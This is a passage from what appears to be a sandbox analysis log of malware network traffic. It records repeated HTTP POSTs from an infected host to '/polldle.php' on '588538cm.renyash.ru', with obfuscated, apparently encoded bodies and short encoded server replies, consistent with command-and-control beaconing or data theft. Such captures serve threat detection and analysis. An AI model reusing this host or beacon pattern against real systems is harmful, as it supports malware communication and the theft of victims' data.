                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:30.786256075 CET  2504  OUT  Data Raw: 5d 5c 54 56 5f 46 5f 5a 54 5d 55 5a 50 5a 59 5e 50 5c 5a 5e 57 52 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\TV_F_ZT]UZPZY^P\Z^WRPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#, 6A$(%!0/9 :-++(?W&U:T-'5,(%#X'/\/<
                                                                                Jan 11, 2025 23:34:30.876405001 CET  25  IN  HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:31.156542063 CET  813  IN  HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d4eSjwCTkk4EYi56xQQ7zpI1qHpFJ%2FpuJH2slLD%2F2Px3Cii%2BSd2rPg3v6jt8%2BhpKH1TNjG1cX7qAT9nj%2Bff%2BE7SJHUWiiH17gPtUQP8v26M0z8UjaxKvSJgD7StiDtfY%2F1jwCUe"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe6bb8532c7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2047&rtt_var=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=349784&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                127 | 192.168.2.4 | 50135 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:31.328114986 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:31.676799059 CET | 2504 | OUT | Data Raw: 58 51 51 57 5f 46 5a 58 54 5d 55 5a 50 5f 59 5c 50 51 5a 52 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQW_FZXT]UZP_Y\PQZRWUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:11'&1)]$<)7,+Y?'&#"U,$!0?#X'/\/(
                                                                                Jan 11, 2025 23:34:31.789762974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:32.017743111 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5GwETfz0FZWjvKbnmVNeFIBJZm0RTreUT%2BA9Cm6qaN%2Fo%2F2besnP1c3N1RPyZu2j7oOaZYf1wcuF%2FcX9YiFdA7g3BRafKllWTrBhDxU9z8Vx5JIZjyQ%2FDMfxoFlT%2FupN0BBeCbd%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fec69c4de97-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3054&min_rtt=1509&rtt_var=3656&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=105270&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                128 | 192.168.2.4 | 50136 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:32.162045956 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:32.520982981 CET | 2504 | OUT | Data Raw: 5d 5d 54 55 5a 48 5f 5a 54 5d 55 5a 50 5a 59 5d 50 50 5a 53 57 53 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TUZH_ZT]UZPZY]PPZSWSP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .#2 $!!X0"<8;+(209:' !/?#X'/\/<
                                                                                Jan 11, 2025 23:34:32.623869896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:32.780324936 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEQ%2ByLag1NhbbWAX5ZwpfGMVBD7lfmzRZZ%2BvXovWh8Iy4syDsAhEvuOdUb9wjPuKvw8r%2BfFX5u7cW3OzyKBYvXVLpjQBguZTVtBMBCLB6qeAB2GPaLnWsJnAiyyc1UMeJ5ww8%2BNG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ff1af0543b9-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4391&min_rtt=1893&rtt_var=5707&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=66715&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                129 | 192.168.2.4 | 50137 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:32.923727036 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:33.270471096 CET | 2504 | OUT | Data Raw: 5d 5b 51 50 5f 41 5f 5a 54 5d 55 5a 50 58 59 5e 50 53 5a 5e 57 55 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QP_A_ZT]UZPXY^PSZ^WUP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@,0%&8[%>%/)W /9_-8#X(?%&V,4'!$+%#X'/\/4
                                                                                Jan 11, 2025 23:34:33.370318890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:33.546621084 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIfhxONe181y3xzYjSp3wx8BGgY09TNaZwoRRFMzoqB9GiqGU%2F5inSVLXoFopgo9tEk6jVI2ZLs889lAGYMmftFo%2BxnQUfEIJVThCbg4ISQ4Ph8bAnQrEcPyzAEi6zJMRy0Da0fU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ff648c218b8-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4224&min_rtt=1490&rtt_var=6027&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62491&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                130 | 192.168.2.4 | 50138 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:33.685380936 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:34.036391020 CET | 2504 | OUT | Data Raw: 58 5a 54 50 5a 47 5a 5e 54 5d 55 5a 50 58 59 5e 50 57 5a 5c 57 54 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTPZGZ^T]UZPXY^PWZ\WTPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -32(Y1"=]0<-V4<,?Y(/%3-0#2<#X'/\/4
                                                                                Jan 11, 2025 23:34:34.149949074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:34.400146961 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZzLvaO4S6s3AEafEwmZUV5qPYEtQ4fl0A1VkhYs8t1WI%2F5HIQShj7CRFTyV3H2OXpkqv4jTwf%2FrufR4dgxcU3a5oA9Ti03LiwAIUhty63T7bcxs1QO0RWefLMEp5sxXRud4EArv"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ffb2dcac35b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3257&min_rtt=1760&rtt_var=3655&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=106243&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                131 | 192.168.2.4 | 50139 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:34.555898905 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:34.911166906 CET | 2504 | OUT | Data Raw: 58 5b 54 5e 5a 43 5a 5e 54 5d 55 5a 50 58 59 58 50 57 5a 5d 57 57 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[T^ZCZ^T]UZPXYXPWZ]WWP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,39%80]&193<: ?:;?[+%05:'$Z#2+#X'/\/4
                                                                                Jan 11, 2025 23:34:35.020275116 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                132 | 192.168.2.4 | 50140 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:35.104732990 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:35.457994938 CET | 1620 | OUT | Data Raw: 58 5d 54 57 5f 41 5f 58 54 5d 55 5a 50 5d 59 5a 50 5c 5a 58 57 54 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TW_A_XT]UZP]YZP\ZXWTPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C:0:10&"%%<* Z!;<(,?%0:.'#"!$(#X'/\/
                                                                                Jan 11, 2025 23:34:35.548927069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:35.820617914 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HW7VMxc3%2FLd6pH%2FyukMurq9Ob7s4FK27LYknXTqxd1JYNSqs2f3gZrQZ%2FEnA3Bh%2F0W%2B9qEzAcAZcTcvm0Htr7wPoNY4DWiCy8nwPTuUZRfIV1ym3immdKY%2FVKlP8O6vaje7%2Fc81D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086003efca80d6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1516&rtt_var=952&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=478531&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 52 33 37 23 03 2a 39 01 10 3a 38 3b 1f 2e 31 0e 5b 29 21 26 5d 37 3a 37 01 25 0c 20 52 3f 14 0c 1b 3f 03 37 1d 22 3d 3d 0d 31 39 23 46 0c 1d 21 00 2a 2f 0e 52 27 3c 0a 58 3c 20 21 01 27 32 20 45 29 1a 3f 55 3d 2a 39 5d 22 02 26 18 2b 31 21 18 3d 1c 3d 02 2f 0f 30 02 32 00 2e 51 0f 16 21 50 21 22 3b 05 37 3d 1e 05 25 0e 3c 03 2b 0a 01 00 25 03 20 51 3c 55 21 00 2b 1c 02 1c 27 3d 0e 0f 25 59 22 16 3e 2a 2f 1a 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a
                                                                                Data Ascii: 98.R37#*9:8;.1[)!&]7:7% R??7"==19#F!*/R'<X< !'2 E)?U=*9]"&+1!==/02.Q!P!";7=%<+% Q<U!+'=%Y">*/?;$\#(V?[M
                                                                                Jan 11, 2025 23:34:35.907345057 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                133 | 192.168.2.4 | 50141 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:35.248857975 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:35.598599911 CET | 2500 | OUT | Data Raw: 58 50 51 57 5a 40 5f 5f 54 5d 55 5a 50 5c 59 5a 50 55 5a 5b 57 51 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPQWZ@__T]UZP\YZPUZ[WQPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C:3.1+,[125_'!4!8;'(&:W.(Z628?5#X'/\/,
                                                                                Jan 11, 2025 23:34:35.690952063 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:35.924890995 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=se4zWhcf1TnzVqkkLgxitqTiZ4Vxqj0RqDtjzvg5sKGTlXcmqsASkS5lcjrDhyDrfwcD5yWKc7OwMUvdOtxK6Jm4LdOCKl4VCKtqTi0a%2BTMdf8yULbBEiIVxs98occyLYMkhvy6Y"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086004de2b42cf-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3357&min_rtt=1684&rtt_var=3979&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96855&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                134 | 192.168.2.4 | 50142 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:36.054343939 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:36.411173105 CET | 2504 | OUT | Data Raw: 58 5c 54 54 5a 48 5f 5b 54 5d 55 5a 50 58 59 59 50 53 5a 53 57 50 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TTZH_[T]UZPXYYPSZSWPPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U%2^,[2*$V 1Z,$<</V1#19'?!2]+%#X'/\/4
                                                                                Jan 11, 2025 23:34:36.497936010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:36.739346027 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M85P%2BQJNQvhi%2FwURw5rf9Hh%2FBqZ2IcQtmLUitMUIEXpkZOp3TzDS4CQ9uFM7woiLLhTiOjkyjIxV9otR3isRFgrmOowCsXf3ddkRkHVosMYzuxjlfqcebpu8Ce5c2nW8h9R79SsP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90086009da1dc42a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2148&min_rtt=1499&rtt_var=1860&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=218203&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                135 | 192.168.2.4 | 50143 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:36.867213964 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:37.223577023 CET | 2504 | OUT | Data Raw: 5d 5b 54 50 5a 49 5a 5d 54 5d 55 5a 50 5b 59 5a 50 54 5a 5a 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TPZIZ]T]UZP[YZPTZZWUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.5%+ %=35S4?=Y;;^+?'23"-$;"T8?5#X'/\/
                                                                                Jan 11, 2025 23:34:37.310647011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:37.549827099 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3N4%2FEAoe0w8uRhNAvpzVYfph9aaKVO2P6iKifGGYd%2FKQjwMxg2pzDJC9CgJDCPKtq7HIkOyd8MRSRs2RQYBOLCqR993i0qL5AZUiLfTEChsRXkzwwvWQ0Q01LnkLjtWlAPGyogU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 9008600eeb8442f5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2323&min_rtt=1691&rtt_var=1898&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=216392&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


